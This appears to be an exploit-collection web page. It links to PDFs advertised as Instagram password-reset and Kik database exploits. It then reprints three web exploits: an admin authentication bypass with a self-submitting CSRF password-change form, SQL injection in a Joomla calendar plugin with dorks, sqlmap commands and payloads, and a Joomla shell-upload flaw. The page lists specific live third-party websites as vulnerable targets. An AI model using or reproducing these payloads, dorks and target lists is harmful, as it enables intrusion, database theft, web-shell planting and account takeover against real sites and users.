[ Exploits ]



NOTE: READ PDF FOR INSTRUCTIONS:

Contains the following: instagram exploit (reset insta acc pw via xss), kik exploit(get in kik db via kik bot)

  • pdf for insta exploit: https://mega.nz/#!x3pCHaAK!HmJDuNN0Lm7ODt79Pl_68GG_VkKGelvQ5JM0bOA05Jc

  • pdf for kik exploit: https://mega.nz/#!QuA2mR7C!BIdu2-Q9CrMvJsuOC88JxCHzlDPJP5iDtN9e-kKbd4o



    User Login and Management PHP Script

    <!--  
     # Exploit Title:  User Login and Management PHP Script - multiple vulnerabilities  
     # Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer 
     # Dork: N/A 
     # Date: 29.08.2017 
     # software link : https://www.codester.com/items/469/user-login-and-management-php-script 
     # demo : http://froiden.cloudapp.net/LoginDashboard/index.php 
     # Version: 3.04 
     # Category: Webapps 
     # Tested on: windows64bit / mozila firefox  
     #  
     # 
     |--!> 
      
     |---------------------------------------------------------------------------------- 
      
     1) admin dashboard authentication bypass  
      
     Description : An Attackers are able to completely compromise the web application built upon 
     the user login and management php script as they can gain access to the admin panel and  
     manage other users as an admin without  authentication! 
       
       
     Step 1: Create a rule in No-Redirect Add-on: ^http://localhost/LoginDashboard/admin/index.php 
     Step 2: Access http://localhost/LoginDashboard/admin/dashboard.php 
       
       
     Risk : Unauthenticated attackers are able to gain full access to the administrator panel 
     and thus have total control over the application and users , including add admin user .. etc 
      
      
     |---------------------------------------------------------------------------------- 
      
      
     2) account takeover - cross side request forgery  
      
      
     Description : attacker can craft a malicious page and send it to any user who is already authenticated to change the password  
      
     > exploitation <  
      
      
     <html> 
     <body> 
     <form name="csrf_form" action="http://localhost/LoginDashboard/code/ajaxChangePassword.php?password=1234567890&cpassword=1234567890" method="POST"> 
      
     <script type="text/javascript">document.csrf_form.submit();</script> 
     </body> 
     </html> 
      
      
     |-----------------------------------------EOF-----------------------------------------

    Account takeover - cross side request forgery



    -- Date: 20/08/2017
    -- Vendor: Homepage: http://joomlathat.com/
    -- W10
    -- Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/calendar-planner/
    -- Version: 1.0.1
    -- Category: Webapps
    -- Dorks:
    === Dork1: "inurl:option=com_calendarplanner"
    === Dork2: "inurl:/index.php/component/calendarplanner/events?searchword=&option=com_calendaprlanner&view=events&category_id="
    === Dork3: "inurl:events?searchword=&option=com_calendarplanner&view=events&category_id="
    -- Creditos: Informacion - Anonymous
    -- Autor: Ihsan Sencan
    -- Web: http://ihsan.net/
    -- DumpDb: Remove: "&date_in=2017-04-17&date_out=&access_select=1&multiselect=1&option=com_calendarplanner&view=events&category_id=0"
    Add: 0'
    Menssage: Alert: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '') ORDER BY ev.date_start ASC , ev.hour_start ASC' at line 1
    A --- Erase : sqlmap -u https://site/es/component/calendarplanner/events?searchword= --------> &date_in=2017-04-17&date_out=&access_select=1&multiselect=1&option=com_calendarplanner&view=events&category_id=0 <----------

    --- sqlmap -u https://www.site.com/es/component/calendarplanner/events?searchword= --dbs

    -- Demo:
    - http://www.dipartimentodesign.polimi.it/agenda/events?searchword=&date_in=2017-01-02&date_out=&option=com_calendarplanner&view=events&category_id=0
    - http://www.aumaujaya.org/index.php/2013-02-24-18-14-58/events/events?searchword=&date_in=2017-04-23&date_out=&access_select=0&access_select=1&option=com_calendarplanner&view=events&category_id=0'
    - http://www.cadam-solutions.ch/2017/index.php/component/calendarplanner/events?searchword=&date_in=2017-04-23&date_out=&access_select=0&access_select=1&option=com_calendarplanner&view=events&category_id=0'
    - http://www.akdh-ev.de/ausstellungen/ausstellungstermine.html?searchword=&date_in=2017-04-23&date_out=&access_select=0&access_select=1&option=com_calendarplanner&view=events&category_id=0'
    - http://www.akdh-ev.de/ausstellungen/ausstellungstermine.html?searchword=&date_in=2017-05-18&date_out=&access_select=0&access_select=1&option=com_calendarplanner&view=events&category_id=0'
    - https://www.serenacentral.com/community/events/events?searchword=&date_in=2017-07-28&date_out=&access_select=0&access_select=1&option=com_calendarplanner&view=events&category_id=0'
    - http://www.dipartimentodesign.polimi.it/agenda/events?searchword=&date_in=2017-03-30&date_out=&option=com_calendarplanner&view=events&category_id=0'
    --P0Ff:

    ============================================

    ==Parameter: searchword (GET)
    ====== Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: searchword=") AND 6499=6499#

    ====== Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: searchword=") OR (SELECT 7934 FROM(SELECT COUNT(*),CONCAT(0x7176717071,(SELECT (ELT(7934=7934,1))),0x7170627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("jqvr"="jqvr

    ====== Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: searchword=") OR SLEEP(5) AND ("mmOk"="mmOk

    ====== Type: UNION query
    Title: MySQL UNION query (NULL) - 29 columns
    Payload: searchword=") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176717071,0x796145654d6e6f6f436e41637678434f74496f765a626a666c645461484d63747648525a56565175,0x7170627a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    =============================================================



    Joomla com_weblinks Shell Upload Vulnerability

    # Exploit Title : Joomla com_weblinks Shell Upload Vulnerability
    # Exploit Author : Dyar Sahdi
    # Website : https://www.facebook.com/Dyar.Sahdi.Linux
    # Dork : allinurl:/index.php?option e_name jform_description asset=com_weblinks
    -----------------------------------------------------------------------
    Exploit Tools
    ----------------------
    http://extensions.joomla.org/extensions/extension/official-extensions/weblinks

    -------------------------------------------------------------------------------------
    Test On: Kali Linux, Win7, Win xp, win10
    ---------------------------------------------------
    First Select Sait using Dorks
    --------------------------
    Example: http://www.elitecreative.ca/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=
    -------------------------------------------------------------------------------------------------------------------------------
    http ://sait/site/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=

    -----------------------------------------------
    Learin Upload shell
    ----------------------
    Just Upload your Shell or txt or Image to Upload Field
    Shell Directory : http://localhost/site/images/dyar.txt
    ----------------------------

    http://www.orrca.org.au/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=
    #
    http://egyptfuntours.com/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=
    #
    http://englishshotokan.net/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=
    #################################################################